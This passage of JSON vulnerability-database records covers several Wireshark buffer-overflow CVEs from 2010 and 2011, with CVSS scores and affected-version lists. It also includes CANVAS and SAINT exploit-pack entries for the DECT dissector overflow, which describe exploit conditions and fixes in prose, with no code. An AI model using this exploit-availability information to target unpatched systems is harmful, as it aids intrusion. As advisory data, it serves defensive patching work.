"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1590"], "modified": "2017-09-19T01:32:00", "cpe": ["cpe:/a:wireshark:wireshark:1.2.5", "cpe:/a:wireshark:wireshark:1.4.0", "cpe:/a:wireshark:wireshark:1.4.2", "cpe:/a:wireshark:wireshark:1.2.15", "cpe:/a:wireshark:wireshark:1.2.0", "cpe:/a:wireshark:wireshark:1.2.13", "cpe:/a:wireshark:wireshark:1.2.10", "cpe:/a:wireshark:wireshark:1.4.1", "cpe:/a:wireshark:wireshark:1.2.8", "cpe:/a:wireshark:wireshark:1.2.14", "cpe:/a:wireshark:wireshark:1.2.7", "cpe:/a:wireshark:wireshark:1.2.6", "cpe:/a:wireshark:wireshark:1.2.3", "cpe:/a:wireshark:wireshark:1.2.1", "cpe:/a:wireshark:wireshark:1.2.9", "cpe:/a:wireshark:wireshark:1.4.3", "cpe:/a:wireshark:wireshark:1.2.2", "cpe:/a:wireshark:wireshark:1.2.12", "cpe:/a:wireshark:wireshark:1.2.4", "cpe:/a:wireshark:wireshark:1.4.4", "cpe:/a:wireshark:wireshark:1.2.11"], "id": "CVE-2011-1590", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1590", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:wireshark:wireshark:1.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:09:49", "description": "Buffer overflow in the ASN.1 BER dissector in Wireshark 0.10.13 through 1.0.13 and 1.2.0 through 1.2.8 has unknown impact and remote attack vectors.", "cvss3": {}, "published": "2010-06-15T14:04:00", "type": "cve", "title": "CVE-2010-2284", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.3, "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2284"], "modified": "2017-09-19T01:31:00", "cpe": ["cpe:/a:wireshark:wireshark:0.99.2", "cpe:/a:wireshark:wireshark:0.99.4", "cpe:/a:wireshark:wireshark:0.10.13", "cpe:/a:wireshark:wireshark:0.99.8", "cpe:/a:wireshark:wireshark:1.0.9", "cpe:/a:wireshark:wireshark:1.2.6", "cpe:/a:wireshark:wireshark:1.0.6", "cpe:/a:wireshark:wireshark:0.99.5", "cpe:/a:wireshark:wireshark:1.0.2", "cpe:/a:wireshark:wireshark:1.0.0", "cpe:/a:wireshark:wireshark:0.99.7", "cpe:/a:wireshark:wireshark:1.0.13", "cpe:/a:wireshark:wireshark:0.99.6", "cpe:/a:wireshark:wireshark:0.99.3", "cpe:/a:wireshark:wireshark:1.2.4", "cpe:/a:wireshark:wireshark:1.2.0", "cpe:/a:wireshark:wireshark:1.0.11", "cpe:/a:wireshark:wireshark:0.99.1", "cpe:/a:wireshark:wireshark:1.2.5", "cpe:/a:wireshark:wireshark:1.0.7", "cpe:/a:wireshark:wireshark:1.2.1", "cpe:/a:wireshark:wireshark:1.0.3", "cpe:/a:wireshark:wireshark:1.2.2", "cpe:/a:wireshark:wireshark:1.2.8", "cpe:/a:wireshark:wireshark:0.10.14", "cpe:/a:wireshark:wireshark:1.0.1", "cpe:/a:wireshark:wireshark:1.0.12", "cpe:/a:wireshark:wireshark:1.0.10", "cpe:/a:wireshark:wireshark:1.0.8", "cpe:/a:wireshark:wireshark:1.0.4", "cpe:/a:wireshark:wireshark:1.2.3", "cpe:/a:wireshark:wireshark:1.0.5", "cpe:/a:wireshark:wireshark:0.99.0", "cpe:/a:wireshark:wireshark:1.2.7"], "id": "CVE-2010-2284", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2284", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:wireshark:wireshark:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.14:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.13:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:09:51", "description": "Buffer overflow in the SigComp Universal Decompressor Virtual Machine dissector in Wireshark 0.10.8 through 1.0.13 and 1.2.0 through 1.2.8 has unknown impact and remote attack vectors.", "cvss3": {}, "published": "2010-06-15T14:04:00", "type": "cve", "title": "CVE-2010-2287", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.3, "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2287"], "modified": "2017-09-19T01:31:00", "cpe": ["cpe:/a:wireshark:wireshark:0.99.2", "cpe:/a:wireshark:wireshark:0.99.4", "cpe:/a:wireshark:wireshark:0.10.13", "cpe:/a:wireshark:wireshark:0.99.8", "cpe:/a:wireshark:wireshark:1.0.9", "cpe:/a:wireshark:wireshark:1.2.6", "cpe:/a:wireshark:wireshark:1.0.6", "cpe:/a:wireshark:wireshark:0.10.9", "cpe:/a:wireshark:wireshark:0.99.5", "cpe:/a:wireshark:wireshark:1.0.2", "cpe:/a:wireshark:wireshark:1.0.0", "cpe:/a:wireshark:wireshark:1.0.13", "cpe:/a:wireshark:wireshark:0.99.7", "cpe:/a:wireshark:wireshark:0.99.6", "cpe:/a:wireshark:wireshark:0.99.3", "cpe:/a:wireshark:wireshark:1.2.4", "cpe:/a:wireshark:wireshark:1.2.0", "cpe:/a:wireshark:wireshark:1.0.11", "cpe:/a:wireshark:wireshark:0.99.1", "cpe:/a:wireshark:wireshark:1.2.5", "cpe:/a:wireshark:wireshark:1.0.7", "cpe:/a:wireshark:wireshark:1.2.1", "cpe:/a:wireshark:wireshark:1.0.3", "cpe:/a:wireshark:wireshark:1.2.2", "cpe:/a:wireshark:wireshark:0.10.8", "cpe:/a:wireshark:wireshark:1.2.8", "cpe:/a:wireshark:wireshark:0.10.14", "cpe:/a:wireshark:wireshark:1.0.1", "cpe:/a:wireshark:wireshark:1.0.12", "cpe:/a:wireshark:wireshark:0.10.12", "cpe:/a:wireshark:wireshark:0.10.11", "cpe:/a:wireshark:wireshark:0.10.10", "cpe:/a:wireshark:wireshark:1.0.10", "cpe:/a:wireshark:wireshark:1.0.8", "cpe:/a:wireshark:wireshark:1.0.4", "cpe:/a:wireshark:wireshark:1.2.3", "cpe:/a:wireshark:wireshark:1.0.5", "cpe:/a:wireshark:wireshark:0.99.0", "cpe:/a:wireshark:wireshark:1.2.7"], "id": "CVE-2010-2287", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2287", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:wireshark:wireshark:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.9:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.14:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.11:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.13:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.10:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.12:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.99.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:22:42", "description": "Stack-based buffer overflow in the ASN.1 BER dissector in Wireshark 0.10.13 through 1.0.14 and 1.2.0 through 1.2.9 has unknown impact and remote attack vectors. NOTE: this issue exists because of a CVE-2010-2284 regression.", "cvss3": {}, "published": "2010-08-13T18:43:00", "type": "cve", "title": "CVE-2010-2994", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2284", "CVE-2010-2994"], "modified": "2017-09-19T01:31:00", "cpe": ["cpe:/a:wireshark:wireshark:0.10.13", "cpe:/a:wireshark:wireshark:1.2.6", "cpe:/a:wireshark:wireshark:1.0.9", "cpe:/a:wireshark:wireshark:1.0.6", "cpe:/a:wireshark:wireshark:1.0.2", "cpe:/a:wireshark:wireshark:1.0.0", "cpe:/a:wireshark:wireshark:1.2.9", "cpe:/a:wireshark:wireshark:1.0.13", "cpe:/a:wireshark:wireshark:1.2.4", "cpe:/a:wireshark:wireshark:1.2.0", "cpe:/a:wireshark:wireshark:1.0.11", "cpe:/a:wireshark:wireshark:1.2", "cpe:/a:wireshark:wireshark:1.2.5", "cpe:/a:wireshark:wireshark:1.0.7", "cpe:/a:wireshark:wireshark:1.2.1", "cpe:/a:wireshark:wireshark:1.0.3", "cpe:/a:wireshark:wireshark:1.2.2", "cpe:/a:wireshark:wireshark:1.2.8", "cpe:/a:wireshark:wireshark:0.10.14", "cpe:/a:wireshark:wireshark:1.0.1", "cpe:/a:wireshark:wireshark:1.0.12", "cpe:/a:wireshark:wireshark:1.0", "cpe:/a:wireshark:wireshark:1.0.10", "cpe:/a:wireshark:wireshark:1.0.8", "cpe:/a:wireshark:wireshark:1.0.4", "cpe:/a:wireshark:wireshark:1.2.3", "cpe:/a:wireshark:wireshark:1.0.5", "cpe:/a:wireshark:wireshark:1.2.7"], "id": "CVE-2010-2994", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2994", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:wireshark:wireshark:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.14:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.13:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:22:43", "description": "The SigComp Universal Decompressor Virtual Machine (UDVM) in Wireshark 0.10.8 through 1.0.14 and 1.2.0 through 1.2.9 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via vectors related to sigcomp-udvm.c and an off-by-one error, which triggers a buffer overflow, different vulnerabilities than CVE-2010-2287.", "cvss3": {}, "published": "2010-08-13T18:43:00", "type": "cve", "title": "CVE-2010-2995", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2287", "CVE-2010-2995"], "modified": "2017-09-19T01:31:00", "cpe": ["cpe:/a:wireshark:wireshark:0.10.13", "cpe:/a:wireshark:wireshark:1.2.6", "cpe:/a:wireshark:wireshark:1.0.9", "cpe:/a:wireshark:wireshark:1.0.14", "cpe:/a:wireshark:wireshark:1.0.6", "cpe:/a:wireshark:wireshark:0.10.9", "cpe:/a:wireshark:wireshark:1.0.2", "cpe:/a:wireshark:wireshark:1.0.0", "cpe:/a:wireshark:wireshark:1.2.9", "cpe:/a:wireshark:wireshark:1.0.13", "cpe:/a:wireshark:wireshark:1.2.4", "cpe:/a:wireshark:wireshark:1.2.0", "cpe:/a:wireshark:wireshark:1.0.11", "cpe:/a:wireshark:wireshark:1.2", "cpe:/a:wireshark:wireshark:1.2.5", "cpe:/a:wireshark:wireshark:1.0.7", "cpe:/a:wireshark:wireshark:1.2.1", "cpe:/a:wireshark:wireshark:1.0.3", "cpe:/a:wireshark:wireshark:1.2.2", "cpe:/a:wireshark:wireshark:0.10.8", "cpe:/a:wireshark:wireshark:1.2.8", "cpe:/a:wireshark:wireshark:0.10.14", "cpe:/a:wireshark:wireshark:1.0.12", "cpe:/a:wireshark:wireshark:1.0.1", "cpe:/a:wireshark:wireshark:0.10.12", "cpe:/a:wireshark:wireshark:0.10.11", "cpe:/a:wireshark:wireshark:0.10.10", "cpe:/a:wireshark:wireshark:1.0.10", "cpe:/a:wireshark:wireshark:1.0.8", "cpe:/a:wireshark:wireshark:1.0.4", "cpe:/a:wireshark:wireshark:1.2.3", "cpe:/a:wireshark:wireshark:1.0.5", "cpe:/a:wireshark:wireshark:1.2.7"], "id": "CVE-2010-2995", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2995", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:wireshark:wireshark:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.9:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.14:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.11:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.8:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.13:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.10:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:0.10.12:*:*:*:*:*:*:*", "cpe:2.3:a:wireshark:wireshark:1.2.2:*:*:*:*:*:*:*"]}], "canvas": [{"lastseen": "2021-07-28T14:33:32", "description": "**Name**| wireshark_dect \n---|--- \n**CVE**| CVE-2011-1591 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Wireshark DECT Dissector Remote Overflow \n**Notes**| CVE Name: CVE-2011-1591 \nNotes: Tested on Wireshark 1.4.4 on WinXP \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1591 \n\n", "edition": 3, "cvss3": {}, "published": "2011-04-29T22:55:00", "type": "canvas", "title": "Immunity Canvas: WIRESHARK_DECT", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1591"], "modified": "2011-04-29T22:55:00", "id": "WIRESHARK_DECT", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/wireshark_dect", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:53", "description": "Added: 10/11/2011 \nCVE: [CVE-2011-1591](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1591>) \nBID: [47392](<http://www.securityfocus.com/bid/47392>) \nOSVDB: [71848](<http://www.osvdb.org/71848>) \n\n\n### Background\n\n[Wireshark](<http://www.wireshark.org/>) is a network packet analyzer. \n\n### Problem\n\nA buffer overflow vulnerability in the DECT dissector (`epan/dissectors/packet-dect.c`) allows command execution via a specially crafted `**.pcap**` file. \n\n### Resolution\n\n[Upgrade](<http://www.wireshark.org/download.html>) to Wireshark 1.4.5 or higher. \n\n### References\n\n<http://www.wireshark.org/security/wnpa-sec-2011-06.html> \n\n\n### Limitations\n\nExploit works on Wireshark 1.4.4. \n\nThe user must open the exploit file in the affected application. \n\nThe \"Wireshark DECT Dissector Remote Stack Buffer Overflow\" remote exploit attempts to exploit the same vulnerability. The remote exploit has additional network and PERL module limitations, but does not require user cooperation. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2011-10-11T00:00:00", "type": "saint", "title": "Wireshark DECT Dissector PCAP File Processing Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-1591"], "modified": "2011-10-11T00:00:00", "id": "SAINT:0E14D95E0722AF66CB8D0704BB89125C", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/wireshark_dect", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:01:57", "description": "Added: 10/19/2011 \nCVE: [CVE-2011-1591](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1591>) \nBID: [47392](<http://www.securityfocus.com/bid/47392>) \nOSVDB: [71848](<http://www.osvdb.org/71848>) \n\n\n### Background\n\n[Wireshark](<http://www.wireshark.org/>) is a network packet analyzer. \n\n### Problem\n\nA buffer overflow vulnerability in the DECT dissector allows command execution when a user sends a specially crafted datagram over a network which is being analyzed by Wireshark. \n\n### Resolution\n\n[Upgrade](<http://www.wireshark.org/download.html>) to Wireshark 1.4.5 or higher. \n\n### References\n\n<http://www.wireshark.org/security/wnpa-sec-2011-06.html> \n\n\n### Limitations\n\nExploit works on Wireshark 1.4.4. \n\nThe affected target running Wireshark must be on the same network as as the SAINTexploit host. \n\nExploit requires the Net-Write PERL module to be installed on the scanning host. This module is available from <http://search.cpan.org/dist/Net-Write/lib/Net/Write.pm>. \n\nThe \"Wireshark DECT Dissector PCAP File Processing Overflow\" client exploit attempts to exploit the same vulnerability. The client exploit does not have the same network and PERL module limitations, but requires user cooperation. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2011-10-19T00:00:00", "type": "saint", "title": "Wireshark DECT Dissector Remote Stack Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-1591"], "modified": "2011-10-19T00:00:00", "id": 